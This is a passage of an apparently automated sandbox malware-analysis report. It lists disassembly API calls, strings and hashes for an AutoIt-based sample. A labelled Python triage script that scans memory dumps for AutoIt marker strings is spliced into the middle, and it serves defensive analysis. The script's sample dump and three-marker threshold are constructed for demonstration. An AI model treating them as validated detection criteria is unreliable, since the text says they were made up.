                            • _wcsncpy.LIBCMT ref: 00DA45C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                            • API String ID: 699586101-1459072770
                            • Opcode ID: 6d5c4e4ab8e3e04f1b87cf8aa32943e62184cf8079c4457412bcb874213b2ae6
                            • Instruction ID: 33c0f1ed3cb0b2d44e9bce28ca2fa43e10c14ecdeee6e7ab8937aa882466061c
                            • Opcode Fuzzy Hash: 6d5c4e4ab8e3e04f1b87cf8aa32943e62184cf8079c4457412bcb874213b2ae6
                            • Instruction Fuzzy Hash: D941D172A002157BDB11AB748C47EFF77ACDF82710F08446AF905E61C2EB75AA019AB5
                            APIs
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D428BC
                            • GetSystemMetrics.USER32(00000007), ref: 00D428C4
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D428EF
                            • GetSystemMetrics.USER32(00000008), ref: 00D428F7
                            • GetSystemMetrics.USER32(00000004), ref: 00D4291C
                            • SetRect.USER32 ref: 00D42939
                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D42949
                            • CreateWindowExW.USER32 ref: 00D4297C
                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D42990
                            • GetClientRect.USER32(00000000,000000FF), ref: 00D429AE
                            • GetStockObject.GDI32(00000011), ref: 00D429CA
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D429D5
                              • Part of subcall function 00D42344: GetCursorPos.USER32(?), ref: 00D42357
                              • Part of subcall function 00D42344: ScreenToClient.USER32(00E057B0,?), ref: 00D42374
                              • Part of subcall function 00D42344: GetAsyncKeyState.USER32 ref: 00D42399
                              • Part of subcall function 00D42344: GetAsyncKeyState.USER32 ref: 00D423A7
                            • SetTimer.USER32(00000000,00000000,00000028,00D41256), ref: 00D429FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                            • String ID: AutoIt v3 GUI
                            • API String ID: 1458621304-248962490
                            • Opcode ID: 837138cb29261752982bee797e391272bbda2d0d14ffe7a4ed842dd63309f687
                            • Instruction ID: 4ac0486c0f6257269cfc4827a4dafab24b8407d0c3a48b4f6174d1609cc60f63
                            • Opcode Fuzzy Hash: 837138cb29261752982bee797e391272bbda2d0d14ffe7a4ed842dd63309f687
                            • Instruction Fuzzy Hash: 45B12A71A1020ADFDB14DFA8DC49BAE7BB5FB48310F548229FA15E6290DB74D840CB70
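                             Added triage example (not part of the Joe Sandbox report and not code recovered from the sample): the record above with the "AutoIt v3 GUI" window title and the earlier __wcsnicmp record carrying the "#OnAutoItStartRegister", "#requireadmin", "#notrayicon" and "#pragma compile" directive strings are the kind of evidence behind the "Binary is likely a compiled AutoIt script file" signature. The Python below scans a raw process memory dump for those runtime strings in the UTF-16LE encoding the W-suffixed USER32 calls imply (with an ASCII fallback) and reports their offsets, so an analyst can confirm the attribution on an unpacked region independently of the sandbox. The dump bytes, the marker list and the three-marker threshold are constructed for the demonstration and are not values taken from this sample.

```python
"""Scan a memory dump for AutoIt v3 runtime strings.

Added example for triage of the report above; it is not code from the
sample or from Joe Sandbox. SAMPLE_DUMP is constructed here for the demo.
"""
import re

# Runtime strings the disassembly listing attributes to the embedded
# AutoIt interpreter (window title plus script directives). Seen together
# in one image they point at the AutoIt stub itself, not at the script.
AUTOIT_MARKERS = [
    "AutoIt v3 GUI",
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#notrayicon",
    "#pragma compile",
    "Bad directive syntax error",
]


def _utf16le(s: str) -> bytes:
    return s.encode("utf-16-le")


def find_autoit_markers(dump: bytes) -> dict:
    """Return {marker: [offsets]} for every marker found in the dump.

    Each marker is searched as UTF-16LE (what the *W APIs consume) and as
    plain ASCII; offsets are byte positions into the dump.
    """
    hits = {}
    for marker in AUTOIT_MARKERS:
        offsets = []
        for encoded in (_utf16le(marker), marker.encode("ascii")):
            offsets += [m.start() for m in re.finditer(re.escape(encoded), dump)]
        if offsets:
            hits[marker] = sorted(offsets)
    return hits


def is_autoit_stub(dump: bytes, min_markers: int = 3) -> bool:
    """Heuristic verdict: at least min_markers distinct runtime strings.

    The threshold is an assumption chosen for this example; a single
    directive string can appear in unrelated text, several together rarely do.
    """
    return len(find_autoit_markers(dump)) >= min_markers


# Constructed sample dump: padding, a few markers, some non-string bytes.
SAMPLE_DUMP = (
    b"\x00" * 32
    + _utf16le("AutoIt v3 GUI") + b"\x00\x00"
    + b"MZ" + b"\x90" * 16
    + _utf16le("#OnAutoItStartRegister") + b"\x00\x00"
    + _utf16le("#requireadmin") + b"\x00\x00"
    + b"\xcc" * 8
)

if __name__ == "__main__":
    for marker, offsets in find_autoit_markers(SAMPLE_DUMP).items():
        print(f"{marker!r} at {[hex(o) for o in offsets]}")
    print("AutoIt stub:", is_autoit_stub(SAMPLE_DUMP))
```

                             To use it on a real dump, read the .sdmp file named under "Memory Dump Source" as bytes and pass it to find_autoit_markers; offsets are relative to the file, so add the dump's base (0x00D40000 here) to compare against the ref: addresses in the listing.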
                            APIs
                            • GetClassNameW.USER32(?,?,00000100), ref: 00D9A47A
                            • __swprintf.LIBCMT ref: 00D9A51B
                            • _wcscmp.LIBCMT ref: 00D9A52E
                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D9A583
                            • _wcscmp.LIBCMT ref: 00D9A5BF
                            • GetClassNameW.USER32(?,?,00000400), ref: 00D9A5F6
                            • GetDlgCtrlID.USER32 ref: 00D9A648
                            • GetWindowRect.USER32(?,?), ref: 00D9A67E
                            • GetParent.USER32(?), ref: 00D9A69C
                            • ScreenToClient.USER32(00000000), ref: 00D9A6A3
                            • GetClassNameW.USER32(?,?,00000100), ref: 00D9A71D
                            • _wcscmp.LIBCMT ref: 00D9A731
                            • GetWindowTextW.USER32(?,?,00000400), ref: 00D9A757
                            • _wcscmp.LIBCMT ref: 00D9A76B
                              • Part of subcall function 00D6362C: _iswctype.LIBCMT ref: 00D63634
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                            • String ID: %s%u
                            • API String ID: 3744389584-679674701
                            • Opcode ID: 9ed3015a4f2c33e1bdb643adba4ecd8753eb98fe2df6813f13364081ff20788d
                            • Instruction ID: 14cb67c02443f483038fd88940664e85208942fa59fca6335eafcacb0ab6766d
                            • Opcode Fuzzy Hash: 9ed3015a4f2c33e1bdb643adba4ecd8753eb98fe2df6813f13364081ff20788d
                            • Instruction Fuzzy Hash: 4BA1AE32204706ABDB14DF68C885FAAB7E8FF44314F148629E999C2190DB30E955CBF2
                            APIs
                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00D9AF18
                            • _wcscmp.LIBCMT ref: 00D9AF29
                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00D9AF51
                            • CharUpperBuffW.USER32(?,00000000), ref: 00D9AF6E
                            • _wcscmp.LIBCMT ref: 00D9AF8C
                            • _wcsstr.LIBCMT ref: 00D9AF9D
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00D9AFD5
                            • _wcscmp.LIBCMT ref: 00D9AFE5
                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00D9B00C
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00D9B055
                            • _wcscmp.LIBCMT ref: 00D9B065
                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00D9B08D
                            • GetWindowRect.USER32(00000004,?), ref: 00D9B0F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                            • String ID: @$ThumbnailClass
                            • API String ID: 1788623398-1539354611
                            • Opcode ID: e277a8a7af4025c2ce570234271545a02969d003bfe7e296616e6c2729c01af0
                            • Instruction ID: 304a8d4563278cb9e60cbae8c2085199fc10bb98731c91e56bfa8cd6e6300d81
                            • Opcode Fuzzy Hash: e277a8a7af4025c2ce570234271545a02969d003bfe7e296616e6c2729c01af0
                            • Instruction Fuzzy Hash: 4481BE721083069BDF04DF14D985FAA7BE8EF44324F08846AFD899A096DB34DD49CBB1
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • DragQueryPoint.SHELL32(?,?), ref: 00DCC627
                              • Part of subcall function 00DCAB37: ClientToScreen.USER32(?,?), ref: 00DCAB60
                              • Part of subcall function 00DCAB37: GetWindowRect.USER32(?,?), ref: 00DCABD6
                              • Part of subcall function 00DCAB37: PtInRect.USER32(?,?,00DCC014), ref: 00DCABE6
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DCC690
                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DCC69B
                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DCC6BE
                            • _wcscat.LIBCMT ref: 00DCC6EE
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DCC705
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DCC71E
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00DCC735
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00DCC757
                            • DragFinish.SHELL32(?), ref: 00DCC75E
                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DCC851
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
                            • API String ID: 169749273-730855631
                            • Opcode ID: 205b8a39ffa28d96b7d4092c9204a2c197e87e3d7137ac889642f7b31a0ac8c0
                            • Instruction ID: 840e5f1b0fd06d97df7d52bfffac94ccf6d3f2d42bca7e765f92337ef3b11da6
                            • Opcode Fuzzy Hash: 205b8a39ffa28d96b7d4092c9204a2c197e87e3d7137ac889642f7b31a0ac8c0
                            • Instruction Fuzzy Hash: BE615C71508302AFC701DF64D885EAFBBE9EF88750F00092EF695932A1DB709949CB72
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                            • API String ID: 1038674560-1810252412
                            • Opcode ID: 29d15367a65cfc86be23937b741cbdc02e52c1bc63def0fb74d4abccf074daaa
                            • Instruction ID: 36a75e4370ad36923a03292a9e1a98deb1a097c83a16a1aeede426ab50bb4ae9
                            • Opcode Fuzzy Hash: 29d15367a65cfc86be23937b741cbdc02e52c1bc63def0fb74d4abccf074daaa
                            • Instruction Fuzzy Hash: F831B036A48209AFDB00EA64DD43EFE77A4EB10710F214028F545750D6EB516F18C6B2
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Cursor$Load$Info
                            • String ID:
                            • API String ID: 2577412497-0
                            • Opcode ID: 802e569f4894b2599f7e2ca29f050ab015097ef284a486f04b9676856749d36d
                            • Instruction ID: 2dd8cc52c9d98ad2d01fec061432e60c7a0cd8067192492a659543e1a940eafa
                            • Opcode Fuzzy Hash: 802e569f4894b2599f7e2ca29f050ab015097ef284a486f04b9676856749d36d
                            • Instruction Fuzzy Hash: 293109B1D4831AAADF109FB69C8999FFFE8FF04750F50452AE50DE7280DA7865008FA1
                            APIs
                            • _memset.LIBCMT ref: 00DCA259
                            • DestroyWindow.USER32 ref: 00DCA2D3
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • CreateWindowExW.USER32 ref: 00DCA34D
                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DCA36F
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DCA382
                            • DestroyWindow.USER32 ref: 00DCA3A4
                            • CreateWindowExW.USER32 ref: 00DCA3DB
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DCA3F4
                            • GetDesktopWindow.USER32 ref: 00DCA40D
                            • GetWindowRect.USER32(00000000), ref: 00DCA414
                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DCA42C
                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DCA444
                              • Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                            • String ID: 0$tooltips_class32
                            • API String ID: 1297703922-3619404913
                            • Opcode ID: 4492159b25ea187173c45c0a948be8388cb2637dc2b4236c7fb0edfec4b0b7b3
                            • Instruction ID: 8da872f8e637af720eb3ad36b55860d6d49ec554f541ba136f55aa8cd3590cd9
                            • Opcode Fuzzy Hash: 4492159b25ea187173c45c0a948be8388cb2637dc2b4236c7fb0edfec4b0b7b3
                            • Instruction Fuzzy Hash: 75716B7114424AAFD725CF28CC49FA677E6FB88304F08452DF985972A0D771E946CB72
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00DC4424
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC446F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                            • API String ID: 3974292440-4258414348
                            • Opcode ID: ba1bd5fa96f067275e27c6546e28ea648e39fda89977a0209b2cee6b6438eee1
                            • Instruction ID: 601634603008ca3918f63593fbfad850f9600df5d8219a8319f927bc498476ed
                            • Opcode Fuzzy Hash: ba1bd5fa96f067275e27c6546e28ea648e39fda89977a0209b2cee6b6438eee1
                            • Instruction Fuzzy Hash: A5913A702047029BCB14EF24C461B6EB7A1EF95354F15886DF8965B3A2CB31ED4ACBB1
                            APIs
                            • LoadImageW.USER32 ref: 00DCB8B4
                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DC91C2), ref: 00DCB910
                            • LoadImageW.USER32 ref: 00DCB949
                            • LoadImageW.USER32 ref: 00DCB98C
                            • LoadImageW.USER32 ref: 00DCB9C3
                            • FreeLibrary.KERNEL32(?), ref: 00DCB9CF
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DCB9DF
                            • DestroyIcon.USER32(?,?,?,?,?,00DC91C2), ref: 00DCB9EE
                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DCBA0B
                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DCBA17
                              • Part of subcall function 00D62EFD: __wcsicmp_l.LIBCMT ref: 00D62F86
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                            • String ID: .dll$.exe$.icl
                            • API String ID: 1212759294-1154884017
                            • Opcode ID: 80d1e6377e4611e569be31ff2e1991e80cea3ce32f1eab69f67f51331b04a467
                            • Instruction ID: 9c7e2a25867167c1f25395911930370911e378801b14cb4eafcdc38482d35c48
                            • Opcode Fuzzy Hash: 80d1e6377e4611e569be31ff2e1991e80cea3ce32f1eab69f67f51331b04a467
                            • Instruction Fuzzy Hash: A161AC7190061ABBEB14DF64CC82FBA7BA8EB08720F10451AFA15D71D1DB75DA90DBB0
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • CharLowerBuffW.USER32(?,?), ref: 00DAA3CB
                            • GetDriveTypeW.KERNEL32 ref: 00DAA418
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA460
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA497
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA4C5
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 2698844021-4113822522
                            • Opcode ID: 541cc63eaa1bd1eea2d0f831831de7b602d4dddb09d65c24fa030d129932468d
                            • Instruction ID: 09bf142bea2dee284168fa8725fb775a553eef36680c3b86f9dd96f002f30890
                            • Opcode Fuzzy Hash: 541cc63eaa1bd1eea2d0f831831de7b602d4dddb09d65c24fa030d129932468d
                            • Instruction Fuzzy Hash: CC5149711043059FC700EF24C89196AB7E4EF89758F04896DF89A972A2DB71ED0ACF72
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00D7E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00D9F8DF
                            • LoadStringW.USER32(00000000,?,00D7E029,00000001), ref: 00D9F8E8
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • GetModuleHandleW.KERNEL32(00000000,00E05310,?,00000FFF,?,?,00D7E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00D9F90A
                            • LoadStringW.USER32(00000000,?,00D7E029,00000001), ref: 00D9F90D
                            • __swprintf.LIBCMT ref: 00D9F95D
                            • __swprintf.LIBCMT ref: 00D9F96E
                            • _wprintf.LIBCMT ref: 00D9FA17
                            • MessageBoxW.USER32 ref: 00D9FA2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 984253442-2268648507
                            • Opcode ID: a02ee78a37d33d5525e819aa8be8c31470d80b65356c9c2e7b1628f41b43f03d
                            • Instruction ID: 45e9b2ba427bd27e785a1fdbec961c9f3f50678815a17e384ba8064c2b1f6615
                            • Opcode Fuzzy Hash: a02ee78a37d33d5525e819aa8be8c31470d80b65356c9c2e7b1628f41b43f03d
                            • Instruction Fuzzy Hash: 1E410672904209ABCF05FBE0DD86EEEB778EF18300F500165B605B61A2EB356F49CA71
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00DCBA56
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DC9207,?,?,00000000,?), ref: 00DCBA6D
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DC9207,?,?,00000000,?), ref: 00DCBA78
                            • CloseHandle.KERNEL32(00000000), ref: 00DCBA85
                            • GlobalLock.KERNEL32(00000000), ref: 00DCBA8E
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DCBA9D
                            • GlobalUnlock.KERNEL32(00000000), ref: 00DCBAA6
                            • CloseHandle.KERNEL32(00000000), ref: 00DCBAAD
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00DCBABE
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DD2CAC,?), ref: 00DCBAD7
                            • GlobalFree.KERNEL32(00000000), ref: 00DCBAE7
                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00DCBB0B
                            • CopyImage.USER32 ref: 00DCBB36
                            • DeleteObject.GDI32(00000000), ref: 00DCBB5E
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DCBB74
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3840717409-0
                            • Opcode ID: 42632bcb87890228c06bda3adaa928e43fff0270ad90eb6ec8ac48199e7202ee
